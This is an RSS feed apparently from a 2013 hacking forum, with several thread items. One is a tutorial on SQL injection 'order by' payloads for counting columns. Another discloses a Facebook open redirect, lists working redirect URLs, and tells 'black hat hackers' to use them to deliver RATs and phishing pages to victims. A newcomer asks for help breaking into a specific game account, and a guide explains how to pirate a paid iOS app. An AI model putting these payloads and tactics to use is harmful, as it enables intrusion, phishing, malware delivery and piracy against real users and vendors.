<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Hack Community - The Best Ethical Hacking Forums - Hacking Tutorials]]></title>
		<link>http://www.hackcommunity.com/</link>
		<description><![CDATA[Hack Community - The Best Ethical Hacking Forums - http://www.hackcommunity.com]]></description>
		<pubDate>Tue, 18 Jun 2013 21:02:39 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Application of Binary search in SQLI]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Application-of-Binary-search-in-SQLI</link>
			<pubDate>Tue, 18 Jun 2013 11:59:43 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Application-of-Binary-search-in-SQLI</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://i1057.photobucket.com/albums/t387/MONETIZING/HChelpers_zps3210ab3a.png" border="0" alt="[Image: HChelpers_zps3210ab3a.png]" /></div>
In this tutorial I will show how you can utilize binary search algorithm when hacking. It's not a very long tutorial, but it is an extremely helpful method to use when hacking.<br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">What is the binary search algorithm?</span></span></span><br />
<br />
<blockquote><cite>Quote:</cite>In computer science, a binary search or half-interval search algorithm finds the position of a specified value (the input "key") within a sorted array. In each step, the algorithm compares the input key value with the key value of the middle element of the array. If the keys match, then a matching element has been found so its index, or position, is returned. Otherwise, if the sought key is less than the middle element's key, then the algorithm repeats its action on the sub-array to the left of the middle element or, if the input key is greater, on the sub-array to the right. If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special "Not found" indication is returned.</blockquote>
Source: <a href="http://en.wikipedia.org/wiki/Binary_search_algorithm" target="_blank">http://en.wikipedia.org/wiki/Binary_search_algorithm</a><br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">How to utilize it?</span></span></span><br />
<br />
I will be using a fictional SQL injection attack to explain this, so let's imagine we have found a vulnerable website <a href="http://www.domain.com/product.php?id=5." target="_blank">http://www.domain.com/product.php?id=5.</a> The id parameter is vulnerable to union injection and we're going to use order by to find out how many columns it has.<br />
<br />
One method would be to start at 1 and count up, but this isn't very efficient if we're working with a lot of columns. This is when we utilize the binary search algorithm. <br />
<br />
We start with a high number, in this case 100. If 100 fails we have determined that the correct number will be somewhere between 1 and 100<br />
<br />
We will most likely now see an error like <span style="font-style: italic;">Unknown column '100' in 'order clause'</span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 100</code></div></div>
<br />
Next we try 50. If we get the same error we now know it's also less than 50.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 50</code></div></div>
<br />
Then we try with 25. Again we get the same error. So it's between 1 and 25 as well.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 25</code></div></div>
<br />
We then try with 12, and the error is gone. No errors means that we are not exceeding the total column count. So now we know that it is equal to or higher than 12 and less than 25<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 12</code></div></div>
<br />
Since 12 is successful we reverse a little bit and we try 15. If this causes the error to return, the number is between 12 and 15<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 15</code></div></div>
<br />
When you are this close you can increase or decrease by one to find the answer<br />
<br />
This might look difficult, but when you get the hang of it you will notice that this approach is far more efficient than increase or decrease by one.<br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">Final words</span></span></span><br />
<br />
I hope you found this tutorial helpful, and as always, if you have any comments or questions don't hesitate to reply. I will try to answer the best I can.]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://i1057.photobucket.com/albums/t387/MONETIZING/HChelpers_zps3210ab3a.png" border="0" alt="[Image: HChelpers_zps3210ab3a.png]" /></div>
In this tutorial I will show how you can utilize binary search algorithm when hacking. It's not a very long tutorial, but it is an extremely helpful method to use when hacking.<br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">What is the binary search algorithm?</span></span></span><br />
<br />
<blockquote><cite>Quote:</cite>In computer science, a binary search or half-interval search algorithm finds the position of a specified value (the input "key") within a sorted array. In each step, the algorithm compares the input key value with the key value of the middle element of the array. If the keys match, then a matching element has been found so its index, or position, is returned. Otherwise, if the sought key is less than the middle element's key, then the algorithm repeats its action on the sub-array to the left of the middle element or, if the input key is greater, on the sub-array to the right. If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special "Not found" indication is returned.</blockquote>
Source: <a href="http://en.wikipedia.org/wiki/Binary_search_algorithm" target="_blank">http://en.wikipedia.org/wiki/Binary_search_algorithm</a><br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">How to utilize it?</span></span></span><br />
<br />
I will be using a fictional SQL injection attack to explain this, so let's imagine we have found a vulnerable website <a href="http://www.domain.com/product.php?id=5." target="_blank">http://www.domain.com/product.php?id=5.</a> The id parameter is vulnerable to union injection and we're going to use order by to find out how many columns it has.<br />
<br />
One method would be to start at 1 and count up, but this isn't very efficient if we're working with a lot of columns. This is when we utilize the binary search algorithm. <br />
<br />
We start with a high number, in this case 100. If 100 fails we have determined that the correct number will be somewhere between 1 and 100<br />
<br />
We will most likely now see an error like <span style="font-style: italic;">Unknown column '100' in 'order clause'</span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 100</code></div></div>
<br />
Next we try 50. If we get the same error we now know it's also less than 50.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 50</code></div></div>
<br />
Then we try with 25. Again we get the same error. So it's between 1 and 25 as well.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 25</code></div></div>
<br />
We then try with 12, and the error is gone. No errors means that we are not exceeding the total column count. So now we know that it is equal to or higher than 12 and less than 25<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 12</code></div></div>
<br />
Since 12 is successful we reverse a little bit and we try 15. If this causes the error to return, the number is between 12 and 15<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.domain.com/product.php?id=5 order by 15</code></div></div>
<br />
When you are this close you can increase or decrease by one to find the answer<br />
<br />
This might look difficult, but when you get the hang of it you will notice that this approach is far more efficient than increase or decrease by one.<br />
<br />
<span style="font-weight: bold;"><span style="color: #87CEFA;"><span style="font-size: large;">Final words</span></span></span><br />
<br />
I hope you found this tutorial helpful, and as always, if you have any comments or questions don't hesitate to reply. I will try to answer the best I can.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Public Disclosure] Facebook Open URL Redirection Vulnerability 2013]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Public-Disclosure-Facebook-Open-URL-Redirection-Vulnerability-2013</link>
			<pubDate>Mon, 17 Jun 2013 16:02:45 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Public-Disclosure-Facebook-Open-URL-Redirection-Vulnerability-2013</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://n1306.hizliresim.com/1b/j/p7ppy.jpg" border="0" alt="[Image: p7ppy.jpg]" /></div>
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Description:</span></span></span></span></span><br />
<span style="font-weight: bold;">[#] Title  :  Facebook Open URL Redirection Vulnerability 2013<br />
[#] Status    :  Unfixed<br />
[#] Severity  :  High<br />
[#] Works on :  Any browser with any version<br />
[#] Author    :  Arul Kumar.V<br />
[#] Email  :  arul.xtronix@gmail.com</span><br />
<br />
<span style="font-weight: bold;">I have found Open URL Redirection Vulnerability in facebook's dialogs such as </span><span style="color: #FF0000;"><span style="font-style: italic;">"OAuth Dialog","Option Dialog","Friends Dialog".</span></span><br />
<span style="font-weight: bold;">This Vulnerability is exploitable to all users who are signed into facebook.In this report,I have included some creative technique with parameters to exploit this bug.<br />
</span><br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="color: #00BFFF;">Impact of Vulnerability:</span></span></span></span></span><br />
<span style="font-weight: bold;">1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.<br />
<br />
2. The user may be subjected to phishing attacks by being redirected to an untrusted page.<br />
<br />
3. This bug can be applicable to any user who are signed in which works at any browsers with any version.</span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-family: Verdana;"><span style="font-size: large;"><span style="color: #00BFFF;">Vulnerable Dialogs:</span></span></span></span></span><br />
<span style="font-weight: bold;">Option Dialog  :  (/dialog/optin)<br />
OAuth Dialog   :  (/dialog/oauth)<br />
Friends Dialog :  (/dialog/friends)</span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="color: #00BFFF;">Proof Of Concept:</span></span></span></span></span><br />
<span style="font-weight: bold;">If any signed facebook user clicks any one of the following link,they will be redirected into our desired pages.URL Shorteners can be used to mask malicious links.</span><br />
<br />
<span style="color: #FF0000;"><span style="font-size: large;"><span style="font-style: italic;">Note:You must be signed into a facebook account to redirect sites.</span></span></span><br />
<br />
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Video:</span></span></span></span></span><br />
<span style="font-weight: bold;">Watch this video in High Definition(HD) on vimeo</span><br />
<!-- start: video_vimeo_embed --><br />
<object width="400" height="230"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=68469298&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=68469298&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="230"></embed></object><br />
<!-- end: video_vimeo_embed --><br />
<br />
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Vulnerable URL's</span></span></span></span></span><br />
<br />
<span style="color: #DAA520;"><span style="font-weight: bold;">1) Using "next" Parameter:</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id==&amp;next=http://google.com<br />
<br />
https://www.facebook.com/dialog/oauth?app_id==&amp;next=http://yahoo.com<br />
<br />
https://m.facebook.com/dialog/friends?app_id==&amp;next=http://bing.com</code></div></div>
<span style="color: #DAA520;"><span style="font-weight: bold;"><br />
2) Using "redirect_uri" Parameter:</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id==&amp;redirect_uri=http://google.com<br />
<br />
https://www.facebook.com/dialog/oauth?app_id==&amp;redirect_uri=http://yahoo.com<br />
<br />
https://m.facebook.com/dialog/friends?app_id==&amp;redirect_uri=http://bing.com</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;">For Black Hat Hackers:</span></span></span></span></span><br />
<span style="font-weight: bold;">Now you can directly send RAT's link,Fake Pages to your victim in Facebook using this Vulnerability by modifying "redirect_uri" Parameter or "next" Parameter.And also URL shorteners to mask your URL.If any of your victim clicked that link,they will be redirected to your malicious page.<br />
You can use this in status updates,messages,comments,etc inside facebook.Facebook will not warn these URL's if anybody clicked it :hehe:<br />
</span><br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Explanation:</span></span></span></span></span><br />
<span style="color: #DAA520;"><span style="font-weight: bold;">1."app_id" Parameter:</span></span><br />
<span style="font-weight: bold;">Any value can be given as input into this parameter such as alphabets,numbers,special characters.</span><br />
<br />
<span style="font-weight: bold;">Example:</span><br />
<span style="font-style: italic;">app_id=arul,app_id=000,app_id==</span><br />
<br />
<span style="font-weight: bold;"><span style="color: #DAA520;">2."next" Parameter:</span></span><br />
<span style="font-weight: bold;">Both "redirect_uri" and "next" Parameters are same.We can use any one of this parameter.Any malicious sites can be given as input into this Parameter with "http://" which will redirect users to that given malicious site.</span><br />
<br />
<span style="font-weight: bold;">Example:</span><br />
<span style="font-style: italic;">next=http://google.com</span><br />
<br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Affected Facebook Subdomains:</span></span></span></span></span><br />
<span style="font-weight: bold;">Both main and mobile site was affected by this vulnerability.It depends upon the dialogs.These are the affected sub-domains in facebook which will vary according to "dialog".Sub domains inlcude mobile,touch,beta-tier and so on.</span><br />
<br />
<span style="font-family: Verdana;"><span style="font-weight: bold;"><span style="color: #DAA520;">OAuth Dialog: ( /dialog/oauth )</span></span></span><br />
<span style="font-weight: bold;">Just take a look on sub-domains here.Just visit all of these URL's</span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://m.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://touch.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://beta.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://m.beta.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://0.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://mbasic.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://pixel.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com</code></div></div>
<br />
<span style="font-family: Verdana;"><span style="font-weight: bold;"><span style="color: #DAA520;">Option Dialog: ( /dialog/optin )</span></span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://m.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://touch.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://beta.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://m.beta.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://0.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://mbasic.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://pixel.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com</code></div></div>
<br />
<span style="color: #DAA520;"><span style="font-weight: bold;">Friends Dialog:  ( /dialog/friends )</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://m.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://touch.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://m.beta.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://0.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://mbasic.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">My Blogspot:</span></span></span></span></span><br />
<span style="font-weight: bold;">If you need more details about this bug Visit my blog,</span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://arulxtronix.blogspot.in/2013/06/facebook-open-url-redirection_3515.html</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-family: Verdana;"><span style="font-size: large;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Conclusion:</span></span></span></span></span><br />
<span style="font-weight: bold;">Finally i have submitted "Open Redirection Vulnerability" with Proof of Concept,Explanation,Instructions.This Vulnerability will works to any facebook user in this universe if they signed in.If you have any queries feel free to contact me at <span style="color: #FF0000;">arul.xtronix@gmail.com</span>.Full credits goes to me</span><br />
<br />
<div style="text-align: center;"><img src="http://s1306.hizliresim.com/1b/k/p87wh.gif" border="0" alt="[Image: p87wh.gif]" /></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://n1306.hizliresim.com/1b/j/p7ppy.jpg" border="0" alt="[Image: p7ppy.jpg]" /></div>
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Description:</span></span></span></span></span><br />
<span style="font-weight: bold;">[#] Title  :  Facebook Open URL Redirection Vulnerability 2013<br />
[#] Status    :  Unfixed<br />
[#] Severity  :  High<br />
[#] Works on :  Any browser with any version<br />
[#] Author    :  Arul Kumar.V<br />
[#] Email  :  arul.xtronix@gmail.com</span><br />
<br />
<span style="font-weight: bold;">I have found Open URL Redirection Vulnerability in facebook's dialogs such as </span><span style="color: #FF0000;"><span style="font-style: italic;">"OAuth Dialog","Option Dialog","Friends Dialog".</span></span><br />
<span style="font-weight: bold;">This Vulnerability is exploitable to all users who are signed into facebook.In this report,I have included some creative technique with parameters to exploit this bug.<br />
</span><br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="color: #00BFFF;">Impact of Vulnerability:</span></span></span></span></span><br />
<span style="font-weight: bold;">1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.<br />
<br />
2. The user may be subjected to phishing attacks by being redirected to an untrusted page.<br />
<br />
3. This bug can be applicable to any user who are signed in which works at any browsers with any version.</span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-family: Verdana;"><span style="font-size: large;"><span style="color: #00BFFF;">Vulnerable Dialogs:</span></span></span></span></span><br />
<span style="font-weight: bold;">Option Dialog  :  (/dialog/optin)<br />
OAuth Dialog   :  (/dialog/oauth)<br />
Friends Dialog :  (/dialog/friends)</span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="color: #00BFFF;">Proof Of Concept:</span></span></span></span></span><br />
<span style="font-weight: bold;">If any signed facebook user clicks any one of the following link,they will be redirected into our desired pages.URL Shorteners can be used to mask malicious links.</span><br />
<br />
<span style="color: #FF0000;"><span style="font-size: large;"><span style="font-style: italic;">Note:You must be signed into a facebook account to redirect sites.</span></span></span><br />
<br />
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Video:</span></span></span></span></span><br />
<span style="font-weight: bold;">Watch this video in High Definition(HD) on vimeo</span><br />
<!-- start: video_vimeo_embed --><br />
<object width="400" height="230"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=68469298&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=68469298&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="230"></embed></object><br />
<!-- end: video_vimeo_embed --><br />
<br />
<span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Vulnerable URL's</span></span></span></span></span><br />
<br />
<span style="color: #DAA520;"><span style="font-weight: bold;">1) Using "next" Parameter:</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id==&amp;next=http://google.com<br />
<br />
https://www.facebook.com/dialog/oauth?app_id==&amp;next=http://yahoo.com<br />
<br />
https://m.facebook.com/dialog/friends?app_id==&amp;next=http://bing.com</code></div></div>
<span style="color: #DAA520;"><span style="font-weight: bold;"><br />
2) Using "redirect_uri" Parameter:</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id==&amp;redirect_uri=http://google.com<br />
<br />
https://www.facebook.com/dialog/oauth?app_id==&amp;redirect_uri=http://yahoo.com<br />
<br />
https://m.facebook.com/dialog/friends?app_id==&amp;redirect_uri=http://bing.com</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;"><span style="font-size: large;">For Black Hat Hackers:</span></span></span></span></span><br />
<span style="font-weight: bold;">Now you can directly send RAT's link,Fake Pages to your victim in Facebook using this Vulnerability by modifying "redirect_uri" Parameter or "next" Parameter.And also URL shorteners to mask your URL.If any of your victim clicked that link,they will be redirected to your malicious page.<br />
You can use this in status updates,messages,comments,etc inside facebook.Facebook will not warn these URL's if anybody clicked it :hehe:<br />
</span><br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Explanation:</span></span></span></span></span><br />
<span style="color: #DAA520;"><span style="font-weight: bold;">1."app_id" Parameter:</span></span><br />
<span style="font-weight: bold;">Any value can be given as input into this parameter such as alphabets,numbers,special characters.</span><br />
<br />
<span style="font-weight: bold;">Example:</span><br />
<span style="font-style: italic;">app_id=arul,app_id=000,app_id==</span><br />
<br />
<span style="font-weight: bold;"><span style="color: #DAA520;">2."next" Parameter:</span></span><br />
<span style="font-weight: bold;">Both "redirect_uri" and "next" Parameters are same.We can use any one of this parameter.Any malicious sites can be given as input into this Parameter with "http://" which will redirect users to that given malicious site.</span><br />
<br />
<span style="font-weight: bold;">Example:</span><br />
<span style="font-style: italic;">next=http://google.com</span><br />
<br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Affected Facebook Subdomains:</span></span></span></span></span><br />
<span style="font-weight: bold;">Both main and mobile site was affected by this vulnerability.It depends upon the dialogs.These are the affected sub-domains in facebook which will vary according to "dialog".Sub domains inlcude mobile,touch,beta-tier and so on.</span><br />
<br />
<span style="font-family: Verdana;"><span style="font-weight: bold;"><span style="color: #DAA520;">OAuth Dialog: ( /dialog/oauth )</span></span></span><br />
<span style="font-weight: bold;">Just take a look on sub-domains here.Just visit all of these URL's</span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://m.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://touch.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://beta.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://m.beta.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://0.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://mbasic.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com<br />
https://pixel.facebook.com/dialog/oauth?app_id==&amp;next=http://www.google.com</code></div></div>
<br />
<span style="font-family: Verdana;"><span style="font-weight: bold;"><span style="color: #DAA520;">Option Dialog: ( /dialog/optin )</span></span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://www.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://m.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://touch.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://beta.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://m.beta.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://0.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://mbasic.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com<br />
https://pixel.facebook.com/dialog/optin?app_id=:&amp;next=http://www.yahoo.com</code></div></div>
<br />
<span style="color: #DAA520;"><span style="font-weight: bold;">Friends Dialog:  ( /dialog/friends )</span></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://m.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://touch.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://m.beta.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://0.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com<br />
https://mbasic.facebook.com/dialog/friends?app_id=:&amp;next=http://twitter.com</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-family: Verdana;"><span style="text-decoration: underline;"><span style="font-weight: bold;">My Blogspot:</span></span></span></span></span><br />
<span style="font-weight: bold;">If you need more details about this bug Visit my blog,</span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://arulxtronix.blogspot.in/2013/06/facebook-open-url-redirection_3515.html</code></div></div>
<br />
<span style="color: #00BFFF;"><span style="font-family: Verdana;"><span style="font-size: large;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Conclusion:</span></span></span></span></span><br />
<span style="font-weight: bold;">Finally i have submitted "Open Redirection Vulnerability" with Proof of Concept,Explanation,Instructions.This Vulnerability will works to any facebook user in this universe if they signed in.If you have any queries feel free to contact me at <span style="color: #FF0000;">arul.xtronix@gmail.com</span>.Full credits goes to me</span><br />
<br />
<div style="text-align: center;"><img src="http://s1306.hizliresim.com/1b/k/p87wh.gif" border="0" alt="[Image: p87wh.gif]" /></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Interesting information about SQL Injection]]></title>
			<link>http://www.hackcommunity.com/Thread-Interesting-information-about-SQL-Injection</link>
			<pubDate>Mon, 17 Jun 2013 11:17:27 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Interesting-information-about-SQL-Injection</guid>
			<description><![CDATA[A few days ago I found a good page about MySQL &amp; SQL Injection testing.<br />
The first part of the page is about MySQL Injection, the second part about MSSQL Injection.<br />
<a href="http://websec.ca/kb/sql_injection" target="_blank">http://websec.ca/kb/sql_injection</a>]]></description>
			<content:encoded><![CDATA[A few days ago I found a good page about MySQL &amp; SQL Injection testing.<br />
The first part of the page is about MySQL Injection, the second part about MSSQL Injection.<br />
<a href="http://websec.ca/kb/sql_injection" target="_blank">http://websec.ca/kb/sql_injection</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Aeriagames hacking]]></title>
			<link>http://www.hackcommunity.com/Thread-Question-Aeriagames-hacking</link>
			<pubDate>Mon, 17 Jun 2013 08:04:54 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Question-Aeriagames-hacking</guid>
			<description><![CDATA[Hi guys im a newbie here my name is mikey and i would love to learn the ways off hacking but i have a website account i want to hack in particular aeriagames.com can someone help me get started perhaps?]]></description>
			<content:encoded><![CDATA[Hi guys im a newbie here my name is mikey and i would love to learn the ways off hacking but i have a website account i want to hack in particular aeriagames.com can someone help me get started perhaps?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How To Get Display Recorder (App Store Version FREE)]]></title>
			<link>http://www.hackcommunity.com/Thread-How-To-Get-Display-Recorder-App-Store-Version-FREE</link>
			<pubDate>Sun, 16 Jun 2013 09:34:19 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-How-To-Get-Display-Recorder-App-Store-Version-FREE</guid>
			<description><![CDATA[<span style="color: #FF0000;"><span style="font-size: xx-large;">Introduction</span></span><br />
In this tutorial, I'll be teaching you how to get Display Recorder (The App Store Version) for FREE! I know what you're thinking. Can't I just get that off of the 3rd party app stores. No, you cant. None of the IPA's work. You will be using AppCake, but you won't be using any AppCake IPA's. You'll need a few things before you start.<br />
<ol type="1">
<li>A Jailbroken iPhone</li>
<li>AppCake</li>
<li>iFile<br />
</li></ol>
<br />
<span style="color: #FF0000;"><span style="font-size: xx-large;">How To Do It</span></span><br />
Once you have all 3 of the things listed above, go on to safari, and go to the following link.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://dl.dropboxusercontent.com/s/6f1sdsxyy7pbdva/display_recorder_v1.0.ipa?dl=1</code></div></div>
Once there, on the top-left of your screen, it should say "Open in...", click that. Then click iFile. When you click that, it will redirect you to AppCake, but relax! That's what it's supposed to do. Now that you're in Appcake, go to your downloads, and choose downloaded. One of your downloaded apps should be the display recorder. Click it, and install it. It should only take a minute or two, and then you have it!]]></description>
			<content:encoded><![CDATA[<span style="color: #FF0000;"><span style="font-size: xx-large;">Introduction</span></span><br />
